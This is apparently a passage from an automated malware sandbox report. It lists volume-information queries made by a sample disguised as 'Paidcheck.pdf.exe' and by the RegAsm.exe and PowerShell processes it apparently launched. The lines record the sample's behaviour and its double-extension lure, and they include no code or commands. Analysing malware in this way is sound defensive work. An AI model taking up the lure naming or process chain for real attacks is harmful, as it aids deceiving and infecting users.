      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
